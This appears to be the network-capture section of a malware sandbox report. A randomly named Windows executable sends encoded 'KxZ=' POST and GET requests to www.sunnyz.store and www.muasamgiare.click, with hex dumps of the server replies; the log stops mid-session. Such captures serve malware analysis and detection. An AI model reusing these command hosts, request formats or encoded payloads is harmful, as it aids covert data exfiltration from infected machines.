                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.6 | 50022 | 217.70.184.50 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:36.457626104 CET | 878 | OUT | POST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 65 76 4f 51 55 57 71 54 68 6c 78 76 76 65 31 65 57 6c 71 55 51 79 36 47 6f 67 7a 45 61 31 39 39 6b 58 63 36 53 67 77 6c 4c 6f 2b 4d 6d 73 6c 35 55 6e 61 7a 4b 68 67 58 42 35 4e 46 43 58 33 59 68 2f 70 68 32 34 34 39 2f 47 6b 6d 51 70 39 6f 4a 47 67 4a 49 64 37 67 66 67 55 77 56 57 4d 64 5a 49 65 41 35 32 64 38 75 4e 6b 50 51 71 63 58 66 47 53 31 56 35 39 30 58 62 37 43 72 49 59 37 61 48 50 42 52 6b 4b 5a 64 6e 4c 78 44 62 37 54 53 4b 6e 41 52 65 66 66 63 49 37 39 4e 4d 31 68 35 69 7a 4d 37 46 62 4c 7a 6e 33 79 6b 49 43 41 30 48 65 45 6a 4c 58 51 3d 3d
                                                                    Data Ascii: KxZ=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxDb7TSKnAReffcI79NM1h5izM7FbLzn3ykICA0HeEjLXQ==
                                                                    Dec 6, 2024 10:06:37.684429884 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:37 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 50025 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:39.133775949 CET | 1891 | OUT | POST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 47 76 53 79 63 57 34 67 35 6c 79 76 76 65 72 4f 57 34 71 55 51 56 36 47 41 6b 7a 45 48 43 39 2f 73 58 61 62 79 67 6c 6b 4c 6f 72 63 6d 73 70 5a 55 71 55 54 4b 77 67 58 52 39 4e 42 6d 58 33 59 68 2f 70 69 75 34 6f 63 2f 47 2f 6d 51 75 72 34 4a 61 72 70 4a 79 37 67 58 65 55 77 68 6f 4d 73 35 49 66 67 70 32 4f 66 47 4e 6f 50 51 6b 64 58 65 42 53 31 5a 59 39 30 36 67 37 47 6a 75 59 38 53 48 5a 6e 38 34 59 34 6c 47 52 68 75 2b 37 45 53 4d 71 48 42 36 5a 4d 31 30 32 4f 55 39 7a 43 52 42 2f 62 6e 6c 62 71 71 5a 2b 7a 45 6e 4d 6c 46 4b 53 41 6d 51 41 31 30 6f 42 54 44 39 6a 55 5a 33 33 54 63 47 66 32 34 34 58 35 6a 53 59 6d 74 79 6b 4a 64 63 73 74 6e 66 4d 6f 54 48 32 65 44 58 68 30 5a 62 70 54 73 4b 61 70 31 64 71 45 31 72 34 42 63 5a 47 7a 35 4c 50 66 58 6a 4b 53 70 31 62 71 70 56 52 51 78 66 54 53 6f 34 39 32 43 66 66 5a 6d 55 31 67 55 32 30 50 79 78 61 69 5a 67 41 39 [TRUNCATED]
                                                                    Data Ascii: KxZ=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+GvSycW4g5lyvverOW4qUQV6GAkzEHC9/sXabyglkLorcmspZUqUTKwgXR9NBmX3Yh/piu4oc/G/mQur4JarpJy7gXeUwhoMs5Ifgp2OfGNoPQkdXeBS1ZY906g7GjuY8SHZn84Y4lGRhu+7ESMqHB6ZM102OU9zCRB/bnlbqqZ+zEnMlFKSAmQA10oBTD9jUZ33TcGf244X5jSYmtykJdcstnfMoTH2eDXh0ZbpTsKap1dqE1r4BcZGz5LPfXjKSp1bqpVRQxfTSo492CffZmU1gU20PyxaiZgA9FxkkohX11lkxmtmUmlaxUUAAtJMyip5ZzhSs+cd6YPdUsWdY0Hzk9ay8bvP5zfMQNIKVsxtPES0rlP5yJFtC7MsKG62j8nTsiFri0/lwysUaRpqG2l9wqsBEwNrqQJeHyBGg7nkBKg2ZJUEZ5OJjvHxqXjMfY9cuxIhHLSpq/3qJhEKFUwwNFDCuNU2R5vXeuckIgcCZY4tX2F6mBpxM7AH7xUxlDjNzPcSlNulPDqwiX12UhY8027ikkyZlkhGLW6JBmz1+rCJGUYjR32bXgU572KaJ1FHrBzSaI94sMkCs1FASl79XRYahZ1YNxmbxNf1/7+NU3PeTdUTaqXBIJ1RV8ttJ15LJRQQs70R85dXRcU7rRGyvBHSB0cMNI30iSpCZ3zVuurreFdjC7gRD4SItYzWXvzTHVy5NzV+uSpjiAdkMUc8XD2VGh8uQ15O1Jg4/KshQ2cqhXkCDm40b4JwjZ6reT61H+UDyQkJeVS5pShj/fz8lqjk0vbmdJbai/Dah/uHe0Aq/WY+v4WI1Yrq4N+dLrzFh+WN6/NqpeMJDPW+rI6A7LGLAUVCkadCpLn3ipeH1NsTmWuoVjddBUUWqwY6qz8PnCIF9kvel6IMnymET03B59K0HdUmaOz1zpHbiC1+5h3lvj5FuAiU3W/owDCeyPsYsdF [TRUNCATED]
                                                                    Dec 6, 2024 10:06:40.441657066 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:40 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 50026 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:41.792201996 CET | 592 | OUT | GET /ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:43.025305033 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:42 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Security-Policy: default-src 'self'; script-src 'nonce-ed66ee13396844e68154a824b5830174';
                                                                    Vary: Accept-Language
                                                                    Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 65 64 36 36 65 65 31 33 33 39 36 38 34 34 65 36 38 31 35 34 61 38 32 34 62 35 38 33 30 31 37 34 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                    Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-ed66ee13396844e68154a824b5830174';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                                    Dec 6, 2024 10:06:43.025383949 CET | 1236 | IN | Data Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                                    Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                                    Dec 6, 2024 10:06:43.025394917 CET | 160 | IN | Data Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                                    Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                                    Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 50027 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:49.216758966 CET | 869 | OUT | POST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 67 50 30 6c 55 67 69 2f 6c 4d 75 56 6f 74 30 52 33 33 58 6a 32 78 75 7a 59 74 65 6a 52 63 63 31 75 67 79 45 65 75 54 32 51 72 39 64 39 5a 62 39 44 61 69 34 75 7a 72 76 77 30 30 66 61 2f 6d 46 39 6d 6b 43 6f 70 54 4b 39 49 50 7a 31 4e 53 68 6f 36 79 4f 6a 54 74 63 54 59 55 79 2b 6c 6d 79 61 36 58 41 51 59 74 61 44 62 44 78 76 76 46 77 39 67 51 37 59 47 37 6a 64 6f 6f 62 46 32 72 63 6c 79 44 57 35 6e 6c 57 56 57 75 4e 73 4d 55 6a 69 77 68 44 30 69 7a 76 4a 6b 36 67 4a 33 7a 52 58 2b 64 4f 68 31 4c 71 61 63 41 69 70 61 4b 72 47 78 42 67 33 4b 50 4b 77 32 48 33 66 75 78 75
                                                                    Data Ascii: KxZ=H6OXM/o3+l9agP0lUgi/lMuVot0R33Xj2xuzYtejRcc1ugyEeuT2Qr9d9Zb9Dai4uzrvw00fa/mF9mkCopTK9IPz1NSho6yOjTtcTYUy+lmya6XAQYtaDbDxvvFw9gQ7YG7jdoobF2rclyDW5nlWVWuNsMUjiwhD0izvJk6gJ3zRX+dOh1LqacAipaKrGxBg3KPKw2H3fuxu
                                                                    Dec 6, 2024 10:06:50.799555063 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:50 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 50028 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:51.888916969 CET | 893 | OUT | POST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 4d 31 75 45 69 45 66 76 54 32 52 72 39 64 79 4a 62 30 41 71 69 78 75 7a 6d 4d 77 32 51 66 61 2f 79 46 39 6b 38 43 76 65 50 4e 38 59 50 78 39 74 53 6a 31 71 79 4f 6a 54 74 63 54 59 42 6c 2b 6b 4f 79 61 4c 6e 41 52 38 78 62 66 72 44 79 6f 76 46 77 73 77 51 6e 59 47 37 64 64 70 6b 39 46 77 33 63 6c 33 6e 57 35 32 6c 56 63 57 75 50 6f 4d 56 64 6a 46 59 37 7a 7a 57 64 41 53 6d 35 58 47 4c 72 62 6f 41 55 39 47 4c 4a 49 4d 67 67 70 59 53 5a 47 52 42 4b 31 4b 33 4b 69 68 4c 51 51 61 55 4e 63 61 72 48 4b 47 43 50 36 6f 43 45 4b 58 64 6b 54 69 78 62 78 51 3d 3d
                                                                    Data Ascii: KxZ=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqM1uEiEfvT2Rr9dyJb0AqixuzmMw2Qfa/yF9k8CvePN8YPx9tSj1qyOjTtcTYBl+kOyaLnAR8xbfrDyovFwswQnYG7ddpk9Fw3cl3nW52lVcWuPoMVdjFY7zzWdASm5XGLrboAU9GLJIMggpYSZGRBK1K3KihLQQaUNcarHKGCP6oCEKXdkTixbxQ==
                                                                    Dec 6, 2024 10:06:53.469347000 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:53 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 50029 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:54.546828985 CET | 1906 | OUT | POST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
